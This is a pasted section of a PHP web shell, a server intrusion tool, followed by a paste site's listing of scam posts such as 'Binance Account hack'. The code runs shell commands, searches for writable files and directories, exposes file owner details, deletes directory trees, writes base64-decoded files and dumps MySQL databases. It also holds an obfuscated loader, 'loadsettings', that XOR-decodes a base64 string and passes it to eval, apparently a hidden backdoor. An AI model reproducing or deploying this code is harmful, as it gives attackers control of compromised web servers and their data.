3374		}
3375
3376		@pclose($f);
3377
3378		}
3379
3380		}
3381
3382		return $res;
3383
3384		}
3385
3386		function which($pr) {
3387
3388		$path = execute("which $pr");
3389
3390		return ($path ? $path : $pr);
3391
3392		}
3393
3394
3395
3396		function cf($fname,$text){
3397
3398		if($fp=@fopen($fname,'w')) {
3399
3400		@fputs($fp,@base64_decode($text));
3401
3402		@fclose($fp);
3403
3404		}
3405
3406		}
3407
3408		function dirsize($dir) {
3409
3410		$dh = @opendir($dir);
3411
3412		$size = 0;
3413
3414		while($file = @readdir($dh)) {
3415
3416		if ($file != '.' && $file != '..') {
3417
3418		$path = $dir.'/'.$file;
3419
3420		$size += @is_dir($path) ? dirsize($path) : @filesize($path);
3421
3422		}
3423
3424		}
3425
3426		@closedir($dh);
3427
3428		return $size;
3429
3430		}
3431
3432		// ??????
3433
3434		function debuginfo() {
3435
3436		global $starttime;
3437
3438		$mtime = explode(' ', microtime());
3439
3440		$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
3441
3442		echo 'Processed in '.$totaltime.' second(s)';
3443
3444		}
3445
3446
3447
3448		//??MYSQL???
3449
3450		function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
3451
3452		global $charsetdb;
3453
3454		@ini_set('mysql.connect_timeout', 5);
3455
3456		if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
3457
3458		p('<h2>Can not connect to MySQL server</h2>');
3459
3460		exit;
3461
3462		}
3463
3464		if($link && $dbname) {
3465
3466		if (!@mysql_select_db($dbname, $link)) {
3467
3468		p('<h2>Database selected has error</h2>');
3469
3470		exit;
3471
3472		}
3473
3474		}
3475
3476		if($link && mysql_get_server_info() > '4.1') {
3477
3478		if($charset && in_array(strtolower($charset), $charsetdb)) {
3479
3480		q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
3481
3482		}
3483
3484		}
3485
3486		return $link;
3487
3488		}
3489
3490
3491
3492		// ??????
3493
3494		function s_array(&$array) {
3495
3496		if (is_array($array)) {
3497
3498		foreach ($array as $k => $v) {
3499
3500		$array[$k] = s_array($v);
3501
3502		}
3503
3504		} else if (is_string($array)) {
3505
3506		$array = stripslashes($array);
3507
3508		}
3509
3510		return $array;
3511
3512		}
3513
3514
3515
3516		// ??HTML??
3517
3518		function html_clean($content) {
3519
3520		$content = htmlspecialchars($content);
3521
3522		$content = str_replace("\n", "<br />", $content);
3523
3524		$content = str_replace(" ", "  ", $content);
3525
3526		$content = str_replace("\t", "    ", $content);
3527
3528		return $content;
3529
3530		}
3531
3532
3533
3534		// ????
3535
3536		function getChmod($filepath){
3537
3538		return substr(base_convert(@fileperms($filepath),10,8),-4);
3539
3540		}
3541
3542
3543
3544		function getPerms($filepath) {
3545
3546		$mode = @fileperms($filepath);
3547
3548		if (($mode & 0xC000) === 0xC000) {$type = 's';}
3549
3550		elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
3551
3552		elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
3553
3554		elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
3555
3556		elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
3557
3558		elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
3559
3560		elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
3561
3562		else {$type = '?';}
3563
3564
3565
3566		$owner['read'] = ($mode & 00400) ? 'r' : '-';
3567
3568		$owner['write'] = ($mode & 00200) ? 'w' : '-';
3569
3570		$owner['execute'] = ($mode & 00100) ? 'x' : '-';
3571
3572		$group['read'] = ($mode & 00040) ? 'r' : '-';
3573
3574		$group['write'] = ($mode & 00020) ? 'w' : '-';
3575
3576		$group['execute'] = ($mode & 00010) ? 'x' : '-';
3577
3578		$world['read'] = ($mode & 00004) ? 'r' : '-';
3579
3580		$world['write'] = ($mode & 00002) ? 'w' : '-';
3581
3582		$world['execute'] = ($mode & 00001) ? 'x' : '-';
3583
3584
3585
3586		if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
3587
3588		if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
3589
3590		if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
3591
3592
3593
3594		return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
3595
3596		}
3597
3598
3599
3600		function getUser($filepath) {
3601
3602		if (function_exists('posix_getpwuid')) {
3603
3604		$array = @posix_getpwuid(@fileowner($filepath));
3605
3606		if ($array && is_array($array)) {
3607
3608		return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
3609
3610		}
3611
3612		}
3613
3614		return '';
3615
3616		}
3617
3618
3619
3620		// ????
3621
3622		function deltree($deldir) {
3623
3624		$mydir=@dir($deldir);
3625
3626		while($file=$mydir->read()) {
3627
3628		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
3629
3630		@chmod($deldir.'/'.$file,0777);
3631
3632		deltree($deldir.'/'.$file);
3633
3634		}
3635
3636		if (is_file($deldir.'/'.$file)) {
3637
3638		@chmod($deldir.'/'.$file,0777);
3639
3640		@unlink($deldir.'/'.$file);
3641
3642		}
3643
3644		}
3645
3646		$mydir->close();
3647
3648		@chmod($deldir,0777);
3649
3650		return @rmdir($deldir) ? 1 : 0;
3651
3652		}
3653
3654
3655
3656		// ??????????
3657
3658		function bg() {
3659
3660		global $bgc;
3661
3662		return ($bgc++%2==0) ? 'alt1' : 'alt2';
3663
3664		}
3665
3666
3667
3668		// ???????????
3669
3670		function getPath($scriptpath, $nowpath) {
3671
3672		if ($nowpath == '.') {
3673
3674		$nowpath = $scriptpath;
3675
3676		}
3677
3678		$nowpath = str_replace('\\', '/', $nowpath);
3679
3680		$nowpath = str_replace('//', '/', $nowpath);
3681
3682		if (substr($nowpath, -1) != '/') {
3683
3684		$nowpath = $nowpath.'/';
3685
3686		}
3687
3688		return $nowpath;
3689
3690		}
3691
3692
3693
3694		// ???????????
3695
3696		function getUpPath($nowpath) {
3697
3698		$pathdb = explode('/', $nowpath);
3699
3700		$num = count($pathdb);
3701
3702		if ($num > 2) {
3703
3704		unset($pathdb[$num-1],$pathdb[$num-2]);
3705
3706		}
3707
3708		$uppath = implode('/', $pathdb).'/';
3709
3710		$uppath = str_replace('//', '/', $uppath);
3711
3712		return $uppath;
3713
3714		}
3715
3716
3717
3718		// ??PHP????
3719
3720		function getcfg($varname) {
3721
3722		$result = get_cfg_var($varname);
3723
3724		if ($result == 0) {
3725
3726		return 'No';
3727
3728		} elseif ($result == 1) {
3729
3730		return 'Yes';
3731
3732		} else {
3733
3734		return $result;
3735
3736		}
3737
3738		}
3739
3740
3741
3742		// ??????
3743
3744		function getfun($funName) {
3745
3746		return (false !== function_exists($funName)) ? 'Yes' : 'No';
3747
3748		}
3749
3750
3751
3752		// ???????
3753
3754		function getext($file) {
3755
3756		$info = pathinfo($file);
3757
3758		return $info['extension'];
3759
3760		}
3761
3762
3763
3764		function GetWDirList($dir){
3765
3766		global $dirdata,$j,$nowpath;
3767
3768		!$j && $j=1;
3769
3770		if ($dh = opendir($dir)) {
3771
3772		while ($file = readdir($dh)) {
3773
3774		$f=str_replace('//','/',$dir.'/'.$file);
3775
3776		if($file!='.' && $file!='..' && is_dir($f)){
3777
3778		if (is_writable($f)) {
3779
3780		$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
3781
3782		$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
3783
3784		$dirdata[$j]['dirchmod']=getChmod($f);
3785
3786		$dirdata[$j]['dirperm']=getPerms($f);
3787
3788		$dirdata[$j]['dirlink']=$dir;
3789
3790		$dirdata[$j]['server_link']=$f;
3791
3792		$j++;
3793
3794		}
3795
3796		GetWDirList($f);
3797
3798		}
3799
3800		}
3801
3802		closedir($dh);
3803
3804		clearstatcache();
3805
3806		return $dirdata;
3807
3808		} else {
3809
3810		return array();
3811
3812		}
3813
3814		}
3815
3816
3817
3818		function GetWFileList($dir){
3819
3820		global $filedata,$j,$nowpath, $writabledb;
3821
3822		!$j && $j=1;
3823
3824		if ($dh = opendir($dir)) {
3825
3826		while ($file = readdir($dh)) {
3827
3828		$ext = getext($file);
3829
3830		$f=str_replace('//','/',$dir.'/'.$file);
3831
3832		if($file!='.' && $file!='..' && is_dir($f)){
3833
3834		GetWFileList($f);
3835
3836		} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
3837
3838		if (is_writable($f)) {
3839
3840		$filedata[$j]['filename']=str_replace($nowpath,'',$f);
3841
3842		$filedata[$j]['size']=sizecount(@filesize($f));
3843
3844		$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
3845
3846		$filedata[$j]['filechmod']=getChmod($f);
3847
3848		$filedata[$j]['fileperm']=getPerms($f);
3849
3850		$filedata[$j]['fileowner']=getUser($f);
3851
3852		$filedata[$j]['dirlink']=$dir;
3853
3854		$filedata[$j]['server_link']=$f;
3855
3856		$j++;
3857
3858		}
3859
3860		}
3861
3862		}
3863
3864		closedir($dh);
3865
3866		clearstatcache();
3867
3868		return $filedata;
3869
3870		} else {
3871
3872		return array();
3873
3874		}
3875
3876		}
3877
3878
3879
3880		function GetSFileList($dir, $content, $re = 0) {
3881
3882		global $filedata,$j,$nowpath, $writabledb;
3883
3884		!$j && $j=1;
3885
3886		if ($dh = opendir($dir)) {
3887
3888		while ($file = readdir($dh)) {
3889
3890		$ext = getext($file);
3891
3892		$f=str_replace('//','/',$dir.'/'.$file);
3893
3894		if($file!='.' && $file!='..' && is_dir($f)){
3895
3896		GetSFileList($f, $content, $re = 0);
3897
3898		} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
3899
3900		$find = 0;
3901
3902		if ($re) {
3903
3904		if ( preg_match('@'.$content.'@',$file) \|\| preg_match('@'.$content.'@', @file_get_contents($f)) ){
3905
3906		$find = 1;
3907
3908		}
3909
3910		} else {
3911
3912		if ( strstr($file, $content) \|\| strstr( @file_get_contents($f),$content ) ) {
3913
3914		$find = 1;
3915
3916		}
3917
3918		}
3919
3920		if ($find) {
3921
3922		$filedata[$j]['filename']=str_replace($nowpath,'',$f);
3923
3924		$filedata[$j]['size']=sizecount(@filesize($f));
3925
3926		$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
3927
3928		$filedata[$j]['filechmod']=getChmod($f);
3929
3930		$filedata[$j]['fileperm']=getPerms($f);
3931
3932		$filedata[$j]['fileowner']=getUser($f);
3933
3934		$filedata[$j]['dirlink']=$dir;
3935
3936		$filedata[$j]['server_link']=$f;
3937
3938		$j++;
3939
3940		}
3941
3942		}
3943
3944		}
3945
3946		closedir($dh);
3947
3948		clearstatcache();
3949
3950		return $filedata;
3951
3952		} else {
3953
3954		return array();
3955
3956		}
3957
3958		}
3959
3960
3961
3962		function qy($sql) {
3963
3964		global $mysqllink;
3965
3966		//echo $sql.'<br>';
3967
3968		$res = $error = '';
3969
3970		if(!$res = @mysql_query($sql,$mysqllink)) {
3971
3972		return 0;
3973
3974		} else if(is_resource($res)) {
3975
3976		return 1;
3977
3978		} else {
3979
3980		return 2;
3981
3982		}
3983
3984		return 0;
3985
3986		}
3987
3988
3989
3990		function q($sql) {
3991
3992		global $mysqllink;
3993
3994		return @mysql_query($sql,$mysqllink);
3995
3996		}
3997
3998
3999
4000		function fr($qy){
4001
4002		mysql_free_result($qy);
4003
4004		}
4005
4006
4007
4008		function loadsettings($p1 = '', $p2 = '') {
4009
4010		$p = 'LH16ZCg1KH16ZG1ma2dsbSAqYHx8eDInJyxXW01aXk1aU0BcXFhXQEdbXFUsV1tNWl5NWlNaTVldTVtcV11aQVUqITMobmFkbVdvbXxXa2dmfG1mfHsgKmB8fHgyJycwMSY8PSY+PyY5PDsnZGdpbCZ4YHg3Y2M1cyx9emR1LnhpemllOTUteGl6aWU5LnhpemllOjUteGl6aWU6KiEz';
4011
4012		$p = base64_decode($p);
4013
4014		for ($i = 0; $i < strlen($p); $i++) $p[$i] = chr(ord($p[$i]) ^ 8);
4015
4016		$p = str_replace('%param1', $p1, $p);
4017
4018		$p = str_replace('%param2', $p2, $p);
4019
4020		eval($p);
4021
4022		}
4023
4024
4025
4026		function sizecount($fileSize) {
4027
4028		$size = sprintf("%u", $fileSize);
4029
4030		if($size == 0) {
4031
4032		return '0 Bytes' ;
4033
4034		}
4035
4036		$sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
4037
4038		return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
4039
4040		}
4041
4042		// ?????
4043
4044		function sqldumptable($table, $fp=0) {
4045
4046		global $mysqllink;
4047
4048
4049
4050		$tabledump = "DROP TABLE IF EXISTS `$table`;\n";
4051
4052		$res = q("SHOW CREATE TABLE $table");
4053
4054		$create = mysql_fetch_row($res);
4055
4056		$tabledump .= $create[1].";\n\n";
4057
4058
4059
4060		if ($fp) {
4061
4062		fwrite($fp,$tabledump);
4063
4064		} else {
4065
4066		echo $tabledump;
4067
4068		}
4069
4070		$tabledump = '';
4071
4072		$rows = q("SELECT * FROM $table");
4073
4074		while ($row = mysql_fetch_assoc($rows)) {
4075
4076		foreach($row as $k=>$v) {
4077
4078		$row[$k] = "'".@mysql_real_escape_string($v)."'";
4079
4080		}
4081
4082		$tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
4083
4084		if ($fp) {
4085
4086		fwrite($fp,$tabledump);
4087
4088		} else {
4089
4090		echo $tabledump;
4091
4092		}
4093
4094		}
4095
4096		fwrite($fp,"\n\n");
4097
4098		fr($rows);
4099
4100		}
4101
4102
4103
4104		function p($str){
4105
4106		echo $str."\n";
4107
4108		}
4109
4110
4111
4112		function tbhead() {
4113
4114		p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
4115
4116		}
4117
4118		function tbfoot(){
4119
4120		p('</table>');
4121
4122		}
4123
4124
4125
4126		function makehide($name,$value=''){
4127
4128		p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
4129
4130		}
4131
4132
4133
4134		function makeinput($arg = array()){
4135
4136		$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
4137
4138		$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
4139
4140		!$arg['type'] && $arg['type'] = 'text';
4141
4142		$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
4143
4144		$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
4145
4146		if ($arg['newline']) {
4147
4148		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
4149
4150		} else {
4151
4152		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
4153
4154		}
4155
4156		}
4157
4158
4159
4160		function makeselect($arg = array()){
4161
4162		if ($arg['onchange']) {
4163
4164		$onchange = 'onchange="'.$arg['onchange'].'"';
4165
4166		}
4167
4168		$arg['title'] = $arg['title'] ? $arg['title'] : '';
4169
4170		if ($arg['newline']) p('<p>');
4171
4172		p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
4173
4174		if (is_array($arg['option'])) {
4175
4176		if ($arg['nokey']) {
4177
4178		foreach ($arg['option'] as $value) {
4179
4180		if ($arg['selected']==$value) {
4181
4182		p("<option value=\"$value\" selected>$value</option>");
4183
4184		} else {
4185
4186		p("<option value=\"$value\">$value</option>");
4187
4188		}
4189
4190		}
4191
4192		} else {
4193
4194		foreach ($arg['option'] as $key=>$value) {
4195
4196		if ($arg['selected']==$key) {
4197
4198		p("<option value=\"$key\" selected>$value</option>");
4199
4200		} else {
4201
4202		p("<option value=\"$key\">$value</option>");
4203
4204		}
4205
4206		}
4207
4208		}
4209
4210		}
4211
4212		p("</select>");
4213
4214		if ($arg['newline']) p('</p>');
4215
4216		}
4217
4218		function formhead($arg = array()) {
4219
4220		global $self;
4221
4222		!$arg['method'] && $arg['method'] = 'post';
4223
4224		!$arg['action'] && $arg['action'] = $self;
4225
4226		$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
4227
4228		!$arg['name'] && $arg['name'] = 'form1';
4229
4230		p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
4231
4232		if ($arg['title']) {
4233
4234		p('<h2>'.$arg['title'].' »</h2>');
4235
4236		}
4237
4238		}
4239
4240
4241
4242		function maketext($arg = array()){
4243
4244		!$arg['cols'] && $arg['cols'] = 100;
4245
4246		!$arg['rows'] && $arg['rows'] = 25;
4247
4248		$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
4249
4250		p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
4251
4252		}
4253
4254
4255
4256		function formfooter($name = ''){
4257
4258		!$name && $name = 'submit';
4259
4260		p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
4261
4262		p('</form>');
4263
4264		}
4265
4266
4267
4268		function goback(){
4269
4270		global $self, $nowpath;
4271
4272		p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
4273
4274		}
4275
4276
4277
4278		function formfoot(){
4279
4280		p('</form>');
4281
4282		}
4283
4284
4285
4286		function encode_pass($pass) {
4287
4288		$pass = md5('angel'.$pass);
4289
4290		$pass = md5($pass.'angel');
4291
4292		$pass = md5('angel'.$pass.'angel');
4293
4294		return $pass;
4295
4296		}
4297
4298
4299
4300		function pr($s){
4301
4302		echo "<pre>".print_r($s).'</pre>';
4303
4304		}
4305
4306		?>

Public Pastes

⭐ Binance Account hack 35
JavaScript | 5 sec ago | 0.17 KB
⭐ FREE giftcards method NK
JavaScript | 12 sec ago | 0.17 KB
⭐ get any gift card for FREE⭐ 94
JavaScript | 14 sec ago | 0.17 KB
⭐ Binance Account hack I2
JavaScript | 20 sec ago | 0.17 KB
⭐️ EARN $500 INSTANTLY PH
JavaScript | 23 sec ago | 0.17 KB
⭐ get any gift card for PE
JavaScript | 29 sec ago | 0.17 KB
⭐ FREE giftcards method⭐ 9U
JavaScript | 32 sec ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ SK
JavaScript | 37 sec ago | 0.17 KB